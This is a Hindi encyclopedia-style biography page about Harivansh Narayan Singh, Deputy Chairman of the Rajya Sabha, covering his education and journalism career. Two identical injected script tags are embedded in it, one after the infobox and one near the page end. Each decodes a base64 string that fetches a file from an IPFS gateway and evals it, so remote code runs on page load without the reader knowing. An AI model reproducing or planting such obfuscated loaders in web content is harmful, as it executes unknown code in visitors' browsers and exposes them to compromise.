हरिवंश नारायण सिंह

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
हरिवंश नारायण सिंह
हरिवंश नारायण सिंह
पूरा नाम हरिवंश नारायण सिंह
जन्म 30 जून, 1956
जन्म भूमि छपरा, बिहार
अभिभावक आशा
नागरिकता भारतीय
प्रसिद्धि उपसभापति, राज्य सभा
पार्टी जनता दल (यूनाइटेड)
कार्य काल राज्य सभा के उपसभापति-9 अगस्त, 2018 से पदस्थ
शिक्षा स्नातक, पत्रकारिता में डिप्लोमा
विद्यालय काशी हिन्दू विश्वविद्यालय
संबंधित लेख राज्य सभा, राज्य सभा के सभापति, राज्य सभा के उपसभापति
अन्य जानकारी पत्रकारिता में डिप्लोमा के दौरान ही वर्ष 1977-1978 में हरिवंश नारायण सिंह 'टाइम्स ऑफ इंडिया समूह', मुंबई में प्रशिक्षु पत्रकार के रूप में चुने गए थे।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

हरिवंश नारायण सिंह (अंग्रेज़ी: Harivansh Narayan Singh, जन्म- 30 जून, 1956, छपरा, बिहार) भारतीय पत्रकार और राजनेता है, जो भारत के वरिष्ठ सदन राज्य सभा में उपसभापति हैं। इस पद पर उन्होंने कांग्रेस सदस्य पी. जे. कुरियन का स्थान लिया है। वह उत्तर प्रदेश के बलिया जिले के रहने वाले हैं। वह कांग्रेस उम्मीदवार बी. के. हरिप्रसाद को 125 के मुकाबले 105 वोटों से हराकर उपसभापति बने हैं।

जन्म तथा शिक्षा

हरिवंश नारायण सिंह का जन्म 30 जून, 1956 को बिहार के छपरा के सिताबदियारा के दलजीत टोला में हुआ था। उन्होंने अपनी प्राथमिक और उच्च प्राथमिक शिक्षा गांव के टोला काशीराय स्थित स्कूल से शुरू की। उसके बाद जे.पी. इंटर कालेज सेवाश्रम (जयप्रकाशनगर) से 1971 में हाईस्कूल उत्तीर्ण करने के बाद वे वाराणसी पहुंचे। वहां यूपी कॉलेज से इंटरमीडिएट और उसके बाद काशी हिन्दू विश्वविद्यालय से स्नातक किया और पत्रकारिता में डिप्लोमा की डिग्री हासिल की।

पत्रकारिता

अप्रैल 2014 में हरिवंश नारायण सिंह को राज्य सभा के लिए बिहार से चुना गया। उनका कार्यकाल अप्रॅल 2020 में पूरा होगा। हरिवंश नारायण सिंह को जयप्रकाश नारायण ने सबसे ज्यादा प्रभावित किया। बनारस हिंदू विश्वविद्यालय से पत्रकारिता में डिप्लोमा के दौरान ही वर्ष 1977-1978 में 'टाइम्स ऑफ इंडिया समूह', मुंबई में प्रशिक्षु पत्रकार के रूप में उनका चयन हुआ।

संपादन कार्य

इसके बाद हरिवंश नारायण सिंह टाइम्स समूह की साप्ताहिक पत्रिका 'धर्मयुग' में 1981 तक उप संपादक रहे। 1981-1984 तक हैदराबाद एवं पटना में बैंक ऑफ इंडिया में नौकरी की और वर्ष 1984 में उन्होंने पत्रकारिता में वापसी की। 1989 में अक्तूबर तक आनंद बाजार पत्रिका समूह से प्रकाशित 'रविवार' साप्ताहिक पत्रिका में सहायक संपादक रहे।

पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख